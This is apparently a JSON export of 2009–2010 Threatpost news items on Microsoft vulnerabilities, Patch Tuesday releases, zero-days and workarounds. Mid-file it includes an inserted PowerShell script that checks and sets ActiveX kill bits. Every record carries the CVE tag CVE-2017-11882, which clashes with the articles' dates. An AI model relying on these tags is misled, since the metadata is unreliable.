{"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:43", "description": "[](<https://threatpost.com/windows-wins-attacks-wild-081909/>)The \u201ccritical\u201d WINS vulnerability that Microsoft issued a patch for last week is now being exploited actively in the wild, [according to the SANS Institute](<http://isc.sans.org/diary.html?storyid=6976>) [sans.org].\n\nThe Internet Storm Center (ISC), which is operated by SANS, is receiving preliminary reports that hackers are targeting Microsoft\u2019s WINS service on Windows NT, 2000 and 2003 servers. [Read the full story](<http://www.cio.com/article/499904/Windows_WINS_Attacks_in_the_Wild?source=rss_security>) [networkworld.com]\n", "cvss3": {}, "published": "2009-08-19T14:44:56", "type": "threatpost", "title": "Windows WINS Attacks In The Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:50", "id": "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "href": "https://threatpost.com/windows-wins-attacks-wild-081909/72957/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:44", "description": "[From Network World (Ellen Messmer)](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>)[](<https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/>)\n\nMicrosoft\u2019s Internet Explorer 8 rated tops among five browsers tested by NSS Labs for effectiveness in protecting against malware and phishing attacks \u2014 though NSS Labs acknowledges Microsoft paid for the tests.\n\nNevertheless, the test process, which lasted over a two-week period in July at the NSS Labs in Austin, evaluated the browsers based on access to live Internet sites and in theory could be duplicated elsewhere. 
Apple Safari 4, Google Chrome 2, Mozilla Firefox 3, and Opera 10 beta were evaluated as being behind Microsoft IE 8 when it comes to browser protection against phishing and malware, mainly because Microsoft was deemed more speedy and comprehensive in delivering updates about known phishing and malware to the user\u2019s desktop browser. [Read the full story](<http://www.thestandard.com/news/2009/08/13/microsoft-ie-8-shines-web-browser-security-test>) [thestandard.com] Here\u2019s [a link to the study and results](<http://nsslabs.com/test-reports/NSS%20Labs%20Browser%20Security%20Test%20-%20Socially%20Engineered%20Malware.pdf>) [pdf from nsslabs.com]\n", "cvss3": {}, "published": "2009-08-14T16:33:17", "type": "threatpost", "title": "Microsoft IE 8 Shines in Web Browser Security Test", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:49", "id": "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "href": "https://threatpost.com/microsoft-ie-8-shines-web-browser-security-test-081409/72970/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:51", "description": "\n\nMicrosoft released six security bulletins today \u2014 three rated Critical and three rated Important. Two of the issues are being actively exploited on the Internet and four of the issues are client-side vulnerabilities, which means the exploit can only occur if a user visits an evil website or opens a malformed document.\n\nToday\u2019s release is important because patches were released for two recent 0-day attacks \u2013 a QuickTime file parsing vulnerability and the recently announced Directshow vulnerability. 
Both vulnerabilities are reported as being actively exploited on the Internet.\n\nWhile Microsoft has announced workarounds and/or provided FixIt tools for each of these issues, today\u2019s patches will be welcomed by network administrators who have been tasked with remediating these issues. I recommend that network administrators download and install the patches for these two bulletins (MS09-028 and MS09-032) as soon as possible.\n\nTwo of Microsoft\u2019s other releases this month apply to products that you don\u2019t see patched very often \u2013 ISA Server 2006 and Virtual PC. Although these two products are associated with security functions, neither flaw is as bad as it seems and Microsoft has rated the severity for each of these as Important.\n\nOf the two remaining bulletins, one applies to Publisher (Important) and one applies to the Operating System (Critical). Neither of these issues was publicly known prior to release, though I recommend reviewing and installing each of these patches as appropriate on your networks. The Operating System patch (MS09-029) is particularly nasty and can execute when a user views an evil web page, email, or Office document.\n\nI recommend installing the MS09-028, 29, and 32 patches first (DirectShow, OS Font patch, and Video Control). These are the three Critical patches \u2013 which goes to show that Microsoft got the Severity ratings spot-on this month.\n\n**Details for MS09-028 and MS09-032:**\n\nMS09-028 is the bulletin for the QuickTime file parsing vulnerability in DirectShow. Clicking on an evil hyperlink or even hovering your mouse over a malformed QuickTime file could allow the attacker to execute code on your system. The attacker\u2019s code would have the same level of permission to your computer as the person who is logged on to the computer. If you\u2019re logged on as admin, the exploit could add or remove users and administrators from your machine, delete files, reformat your hard drive, or embed trojans or worms that could be used in future attacks.\n\nIt\u2019s important to note for this issue that the presence or absence of Apple QuickTime is not relevant to whether or not your computer is vulnerable. The flaw resides in the Microsoft components that parse QuickTime files \u2013 so don\u2019t believe that you\u2019re safe just because you don\u2019t have QuickTime installed. Also, the recent QuickTime patch from Apple (7.6.2) is not related to this issue.\n\nMS09-028 is rated as Critical for all affected Operating Systems.\n\nMS09-032 is the bulletin for the recently announced Microsoft Video ActiveX Control (DirectShow) vulnerability. Viewing a malformed media file from a Windows XP or Windows Server 2003 system can enable the attacker to execute code on your system. Similar to MS09-028, the evil code will run in the context of the currently logged on user and can take any action on that system that the logged on user can take.\n\nMicrosoft released a FixIt tool that sets the browser killbits for this vulnerable control. The MS09-032 patch is a cumulative killbit patch that includes the killbits from the FixIt tool as well as all previously released ActiveX killbits. Users who installed the ActiveX cumulative patch from June 2009 and also ran the FixIt tool for the DirectShow issue have already implemented the complete set of killbits represented by the MS09-032 patch. If you ran the FixIt tool or otherwise implemented the Microsoft suggested workaround you are safe \u2013 there\u2019s no need to revert changes that you made.\n\nWhile the public exploit only impacts XP and 2003 systems, Microsoft recommends installing this patch on all Operating Systems as it includes killbits for all previously known bad ActiveX controls.\n\nDetails for the remaining four:\n\n**MS09-029** applies to all Operating Systems and could be a particularly nasty issue if left unpatched. The flaw resides in the way that Microsoft parses embedded fonts on web pages, emails, and Office documents (in this case, Embedded OpenType fonts; EOT fonts ensure that everyone viewing the text sees it formatted the same way). Viewing an evil web page, email, or Office doc could allow the attacker to execute code on your system. Workarounds are available, but they require two separate changes to be made \u2013 one to protect from web content and the other to protect from evil emails and documents.\n\n**MS09-030** is a vulnerability in Microsoft Publisher documents. Viewing a malformed document could allow the attacker to run code on your system. This seems like the hundredth vulnerability in Publisher this year, and the millionth \u2018open an evil document and get hacked\u2019 vulnerability in the past two years.\n\n**MS09-031** discusses an issue with ISA Server 2006. If the ISA Server is specifically configured to use RADIUS one-time passwords AND to use Kerberos for authentication AND to fall back to basic HTTP authentication when asked, the attacker may be able to access servers protected by the firewall if they know a valid username for those target systems. It sounds scary, but it\u2019s probably a very small number of systems in the world that are configured exactly this way. An edge case at best. If you have an ISA Server 2006 and you\u2019re concerned that you might meet all three criteria above, it\u2019s best to patch your system. 
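The kill bit mechanism the column leans on (the FixIt tool and the cumulative ActiveX update both work by setting it) can be verified per control rather than taken on faith. The following is an added example, not code from the column, from Shavlik or from Microsoft. It assumes the documented registry location for kill bits (the Compatibility Flags DWORD under the ActiveX Compatibility key, with 0x400 as the kill bit) and uses a placeholder CLSID, since the column does not list the CLSIDs the patch covers.

```powershell
# Added example (not from the Threatpost column or from Microsoft): check whether the
# Internet Explorer kill bit is set for an ActiveX control, and set it if needed.
# The kill bit is bit 0x400 of the "Compatibility Flags" DWORD under
#   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}
# On 64-bit Windows the 32-bit browser reads the Wow6432Node copy, so both views
# are checked. The CLSID in the usage block is a placeholder, not a real control.

$KillBit = 0x400

function Get-KillBitPath {
    param([Parameter(Mandatory)][string]$Clsid, [switch]$Wow64)
    $base = if ($Wow64) {
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
    } else {
        'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility'
    }
    Join-Path $base $Clsid
}

function Test-KillBit {
    # Returns $true only when the key exists and the 0x400 bit is set.
    param([Parameter(Mandatory)][string]$Clsid, [switch]$Wow64)
    $path = Get-KillBitPath -Clsid $Clsid -Wow64:$Wow64
    if (-not (Test-Path $path)) { return $false }
    $flags = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (($flags -band $KillBit) -ne 0)
}

function Set-KillBit {
    # Sets the kill bit while preserving any other compatibility flags already present.
    param([Parameter(Mandatory)][string]$Clsid, [switch]$Wow64)
    $path = Get-KillBitPath -Clsid $Clsid -Wow64:$Wow64
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = [int]$existing -bor $KillBit
    Set-ItemProperty -Path $path -Name 'Compatibility Flags' -Value $new -Type DWord
}

# Usage (run elevated): audit a list of CLSIDs in both registry views.
$clsids = @('{00000000-0000-0000-0000-000000000000}')   # placeholder CLSID
foreach ($c in $clsids) {
    [pscustomobject]@{
        CLSID  = $c
        Native = Test-KillBit -Clsid $c
        Wow64  = Test-KillBit -Clsid $c -Wow64
    }
}
```

Setting the bit by hand is the same operation the FixIt performs, which is why the column can say there is nothing to revert once the cumulative patch lands: the patch writes the same value, and Set-KillBit above ORs the bit in rather than overwriting flags that other compatibility settings may have set.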
\n\n**MS09-033** relates to guest operating systems that are hosted on Microsoft Virtual PC or Virtual Server. These virtualized systems are subject to a privilege escalation attack. (Non-virtualized systems are not vulnerable.) Users who can execute code on the virtual systems can run an exploit and become administrator on the virtual images. At no time can this flaw lead to compromise of the underlying Virtual PC or Virtual Server host. In other words, it\u2019s not the much-hyped but yet-to-be-seen exploit that crosses the virtualization barrier.\n\n_* Eric Schultze is chief technology officer at Shavlik Technologies, a vulnerability management company._\n", "cvss3": {}, "published": "2009-07-14T19:02:19", "type": "threatpost", "title": "Inside Microsoft's July Security Patch Batch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-03T16:20:54", "id": "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "href": "https://threatpost.com/inside-microsofts-july-security-patch-batch-071409/72909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "[From InfoWorld (Roger Grimes)](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)\n\nTalk about a turnaround. It\u2019s always hard to recognize the larger, slow-moving paradigm shifts as they happen. But after a decade of bad press regarding its commitment to software security, Microsoft seems to have turned the tide. Redmond is getting consistent security accolades these days, often from the very critics who used to call it out. Many of the world\u2019s most knowledgeable security experts are urging their favorite software vendors to follow in the footsteps of Microsoft. 
Read the full story [[InfoWorld.com](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)].\n", "cvss3": {}, "published": "2009-06-19T18:13:35", "type": "threatpost", "title": "Microsoft Takes the Lead in Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "href": "https://threatpost.com/microsoft-takes-lead-security-061909/72854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. 
Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "cvss3": {}, "published": "2009-06-09T20:26:38", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:09", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d [said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. 
[Read the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "cvss3": {}, "published": "2009-05-19T15:38:56", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:14", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:16", "description": "Microsoft on Wednesday plans to launch a new research effort to determine the total cost of the patch-management cycle, from testing and distributing a fix to user deployment of the patch. The end result of the project, which will be completely open and transparent to outsiders, will be a full metrics model that the company plans to make freely available.\n\nThe metrics project will be handled by the analyst firm Securosis, which will do surveys and interviews with end users and will be responsible for building out the model. Rich Mogull, the firm\u2019s founder, said when Microsoft contacted him about the project he was encouraged by the open, product-neutral way in which the company wanted to approach it. \n\n\u201cThis is not a vendor tool. It\u2019s not product-focused at all,\u201d Mogull said. \u201cIt\u2019s focused on the organizations and the end users. We\u2019re looking at the patch management cycle. 
What are the total costs for the total cycle, from monitoring what you need to patch all the way to getting the patch out.\u201d\n\nAs part of the process, Securosis will be posting all of the correspondence between the firm and Microsoft about the project, inviting other vendors to participate and make suggestions and encouraging users to comment on the project as it progresses. Mogull said he hopes to have the first version of the model finished by the end of June.\n\nThe project is being driven on Microsoft\u2019s end by Jeff Jones, a strategy director in the company\u2019s Security Technology Unit. Mogull said that he and Jones have talked at length about the transparency and objectivity requirements around the metrics model.\n\n\u201cOur research model is radically transparent and that\u2019s how this is going to be too,\u201d Mogull said. \u201cEverything will be out in the open. I wouldn\u2019t do something like this if it wasn\u2019t. The goal for the project is to produce an objective, independent model, irrespective of Microsoft.\u201d\n\nMogull has created a separate [Web page](<http://securosis.com/projectquant>) to discuss the project, which is where the materials related to the effort will be available once it gets underway. He lists the goals and deliverables of the effort, which he\u2019s calling Project Quant for now, and emphasizes the open and transparent nature of the project.\n\n\u201cAll materials will be made publicly available throughout the project, including internal communications (the Totally Transparent Research process). 
The model will be developed through a combination of primary research, surveys, focused interviews, and public/community participation,\u201d Mogull writes.\n\n*Composite header image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2019s Flickr photostream\n", "cvss3": {}, "published": "2009-04-15T11:45:37", "type": "threatpost", "title": "Microsoft to unveil patch management metrics project", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:21", "id": "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "href": "https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/72588/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:20", "description": "Microsoft has issued an advisory to warn about an under-attack zero-day vulnerability affecting its PowerPoint software.\n\nAccording to [the pre-patch advisory](<http://www.microsoft.com/technet/security/advisory/969136.mspx>), the flaw allows remote code execution if a user opens a booby-trapped PowerPoint file. The company described the attacks as \u201climited and targeted.\u201d\n\nAffected software:\n\nMicrosoft Office PowerPoint 2000 Service Pack 3 \nMicrosoft Office PowerPoint 2002 Service Pack 3 \nMicrosoft Office PowerPoint 2003 Service Pack 3 \nMicrosoft Office 2004 for Mac\n\nIn the absence of a fix, Microsoft [recommends](<http://www.microsoft.com/technet/security/advisory/969136.mspx>) the following workarounds:\n\n * Do not open or save Office files that you receive from un-trusted sources or that are received unexpectedly from trusted sources. 
This vulnerability could be exploited when a user opens a file.\n * Use the Microsoft Office Isolated Conversion Environment (MOICE) when opening files from unknown or untrusted sources. \n * The Microsoft Office Isolated Conversion Environment (MOICE) will protect Office 2003 installations by more securely opening Word, Excel, and PowerPoint binary format files.\n * Use Microsoft Office File Block policy to block the opening of Office 2003 and earlier documents from unknown or untrusted sources and locations.\n", "cvss3": {}, "published": "2009-04-02T23:35:53", "type": "threatpost", "title": "Microsoft issues PowerPoint zero-day warning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:25", "id": "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "href": "https://threatpost.com/microsoft-issues-powerpoint-zero-day-warning-040209/72535/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "Gartner security analyst Neil MacDonald thinks [there are five levels to the discussion](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) [gartner.com] about whether Microsoft should be in the security business. 
They include secure coding (obviously), secure functionality in the platform at no cost (of course), add-on security products at a fee (maybe) and paid cloud-based security services (sure).\n\nRead [the full blog post and take a stab at the questions](<http://blogs.gartner.com/neil_macdonald/2009/03/18/should-microsoft-be-in-the-security-business/>) MacDonald poses.\n\nImage [via Wonderlane](<http://www.flickr.com/photos/wonderlane/1378294362/>) (Flickr CC 2.0)\n", "cvss3": {}, "published": "2009-03-19T15:18:05", "type": "threatpost", "title": "Should Microsoft be in the security business?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:36", "id": "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "href": "https://threatpost.com/should-microsoft-be-security-business-031909/72395/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:31", "description": "Microsoft has pushed out a new release candidate of Internet Explorer 9 that includes two new privacy protections designed to enable consumers to prevent tracking by some Web sites.\n\nThe new [IE 9 release candidate](<http://blogs.msdn.com/b/ie/archive/2010/12/07/ie9-and-privacy-introducing-tracking-protection-v8.aspx>) has two separate, but related, technologies aimed at giving users more control over how sites track them and what data is sent back to the site\u2019s owners: Tracking Protection and Tracking Protection Lists. The functionality allows users to specify exactly which sites they will allow to track them to some extent and enables sites to publish lists that show consumers what information might be collected.\n\nThe announcement by Microsoft comes in the midst of a complex discussion among lawmakers, regulators and privacy advocates about whether a national \u201cDo-Not Track\u201d list for browsers is desirable or even feasible. 
The [Federal Trade Commission recently proposed such a list](<https://threatpost.com/ftc-pushes-do-not-track-option-web-browsers-120110/>) in a report it released on privacy issues. Microsoft officials said that they were interested in finding a way to answer some of the same questions raised by the FTC.\n\n\u201cWe believe that the combination of consumer opt-in, an open platform for publishing of Tracking Protection Lists (TPLs), and the underlying technology mechanism for Tracking Protection offer new options and a good balance between empowering consumers and online industry needs. They further empower consumers and complement many of the other ideas under discussion,\u201d Dean Hachamovitch, corporate vice president for IE at Microsoft, wrote in a blog post about the new features. \u201cWhile \u2018Do not track\u2019 is a meaningful consumer promise around data use, the web lacks a good precise definition of [what tracking means](<http://www.research-live.com/ftc-chief-says-do-not-track-idea-is-still-on-the-table/4003244.article>). Until we get there, we can make progress by providing consumers with a way to limit or control the data collected about them on sites they don\u2019t visit directly. That kind of control is already technically feasible today [in a variety of ways](<http://blogs.msdn.com/b/ie/archive/2010/11/30/selectively-filtering-content-in-web-browsers.aspx>). It is important to understand that the feature design makes no judgment about how information might be used. Rather, it provides the means for consumers to opt-out of the release of that information in the first place.\u201d\n\nThe new privacy mechanisms in IE 9 will be opt-in, so users will need to make conscious decisions about what sites they are blocking and which they are allowing to track them. 
Users will be able to manually add specific sites to the Tracking Protection mechanism and also can add Tracking Protection Lists published by various Web sites to their browsers. The TPLs will include URLs that the user only wants IE to call out to if the user actually types the address into the browser or clicks on a link to the site. \n\n\u201cIn addition to \u2018Do Not Call\u2019 entries that prevent information requests to some web addresses, lists can include \u2018OK to Call\u2019 entries that permit calls to specific addresses. In this way, a consumer can make exceptions to restrictions on one list easily by adding another list that includes \u2018OK to Call\u2019 overrides for particular addresses,\u201d Hachamovitch wrote. \u201cWe designed this feature so that consumers have a clear, straightforward, opt-in mechanism to enable a higher degree of control over sharing their browsing information AND websites can provide easy to use lists to manage their privacy as well as experience full-featured sites.\u201d\n", "cvss3": {}, "published": "2010-12-07T20:00:18", "type": "threatpost", "title": "Microsoft Adds Tracking Protection to IE 9", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:34", "id": "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "href": "https://threatpost.com/microsoft-adds-tracking-protection-ie-9-120710/74747/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:42", "description": "There\u2019s a new flaw in all of the current versions of Internet Explorer that is being used in some targeted attacks right now. Microsoft has confirmed the bug and said it is working on a fix, but has no timeline for the patch release yet. 
The company did not rule out an emergency out-of-band patch, however.\n\nThe new bug in Internet Explorer affects versions 6, 7 and 8, but is not present in IE 9 beta releases, Microsoft said. The company has released an [advisory on the IE vulnerability](<https://www.microsoft.com/technet/security/advisory/2458511.mspx>) and says that some of the exploit protections it has added to recent versions of IE and Windows can help protect against attacks on the bug. Microsoft said that IE 8 running on Windows XP SP 3 and later versions of Windows has DEP (Data Execution Prevention) enabled by default, which helps stop attacks against this specific bug. IE running in Protected Mode also helps mitigate the effects of attacks.\n\n\u201cThe vulnerability exists due to an invalid flag reference within Internet Explorer. It is possible under certain conditions for the invalid flag reference to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.\n\n\u201cAt this time, we are aware of targeted attacks attempting to use this vulnerability. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe new IE flaw is likely to be targeted through drive-by download attacks, a common attack scenario for browser vulnerabilities. \n\n\u201cIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. 
In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker\u2019s Web site,\u201d Microsoft said.\n", "cvss3": {}, "published": "2010-11-03T16:03:17", "type": "threatpost", "title": "New Bug in Internet Explorer Used in Targeted Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:16:08", "id": "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "href": "https://threatpost.com/new-bug-internet-explorer-used-targeted-attacks-110310/74636/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "Microsoft is warning customers that it has seen ongoing attacks against the recently disclosed padding oracle [vulnerability in ASP.NET](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) and is encouraging them to [implement a workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that will help protect against the publicly disclosed exploit for the bug.\n\nThe [workaround](<http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx>) that Microsoft has developed causes ASP.NET applications to return the same error message, regardless of what the actual error it encounters is. 
This prevents the server from sending error messages to the attacker that might give him important information about what error was caused on the application.\n\n\u201cA workaround you can use to prevent this vulnerability is to enable the <customErrors> feature of ASP.NET, and explicitly configure your applications to always return the same error page \u2013 regardless of the error encountered on the server. By mapping all error pages to a single error page, you prevent a hacker from distinguishing between the different types of errors that occur on a server,\u201d Microsoft\u2019s Scott Guthrie said in a blog post explaining the workaround. \u201c**Important**: It is not enough to simply turn on CustomErrors or have it set to RemoteOnly. You also need to make sure that all errors are configured to return the same error page. This requires you to explicitly set the \u201cdefaultRedirect\u201d attribute on the <customErrors> section and ensure that no per-status codes are set.\u201d\n\nHowever, the researchers who [demonstrated the ASP.NET attack](<https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/>) at the Ekoparty conference last week, Juliano Rizzo and Thai Duong, said that the [attack will work even without error messages](<https://twitter.com/thaidn/statuses/24832350146>) from the target application. \n\nMicrosoft security officials said that they plan to release a patch for the ASP.NET flaw, although they have not specified any time frame for the release. 
\n", "cvss3": {}, "published": "2010-09-21T15:04:11", "type": "threatpost", "title": "Microsoft Warns of Attacks Against ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:00:14", "id": "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "href": "https://threatpost.com/microsoft-warns-attacks-against-aspnet-flaw-092110/74498/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:16", "description": "Microsoft\u2019s security response team is investigating the release of a new zero-day flaw that exposes Windows 7 users to blue-screen crashes or code execution attacks.\n\nThe flaw could be exploited by local attackers to cause a denial-of-service or potentially gain elevated privileges, according to an advisory from VUPEN, a French security research outfit.\n\nFrom VUPEN\u2019s advisory:\n\n_This issue is caused by a buffer overflow error in the \u201cCreateDIBPalette()\u201d function within the kernel-mode device driver \u201cWin32k.sys\u201d when using the \u201cbiClrUsed\u201d member value of a \u201cBITMAPINFOHEADER\u201d structure as a counter while retrieving Bitmap data from the clipboard, which could be exploited by malicious users to crash an affected system or potentially execute arbitrary code with kernel privileges._\n\nThe flaw is confirmed on fully patched Microsoft Windows 7, Windows Server 2008 SP2, Windows Server 2003 SP2, Windows Vista SP2, and Microsoft Windows XP SP3.\n\nMicrosoft plans to issue 13 bulletins with patches for 34 vulnerabilities tomorrow (Tuesday August 10) but it is unlikely we will see a fix for this new issue.\n", "cvss3": {}, "published": "2010-08-09T13:39:48", "type": "threatpost", "title": "Another Windows 7 Zero-Day Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:22", "id": "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "href": 
"https://threatpost.com/another-windows-7-zero-day-released-080910/74306/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:21", "description": "Microsoft has no plans to follow in the footsteps of Mozilla and Google and pay researchers cash rewards for the bugs that they find in Microsoft\u2019s products.\n\nIn the wake of both Mozilla and Google significantly increasing their bug bounties to the $3,000 range, there have been persistent rumors in the security community that Microsoft soon would follow suit and start paying bounties as well. However, a company official said on Thursday that Microsoft was not interested in paying bounties.\n\n\u201cWe value the researcher ecosystem, and show that in a variety of ways, but we don\u2019t think paying a per-vuln bounty is the best way. Especially when across the researcher community the motivations aren\u2019t always financial. It is well-known that we acknowledge researcher\u2019s contributions in our bulletins when a researcher has coordinated the release of vulnerability details with the release of a security update,\u201d Microsoft\u2019s Jerry Bryant said in an email. \u201cWhile we do not provide a monetary reward on a per-bug basis, like any other industry, we do recognize and honor talent. We\u2019ve had several influential folks from the researcher community join our security teams as Microsoft employees. We\u2019ve also entered into contracts directly with many vendors and sometimes individual researchers to test our products for vulnerabilities before they\u2019re released. 
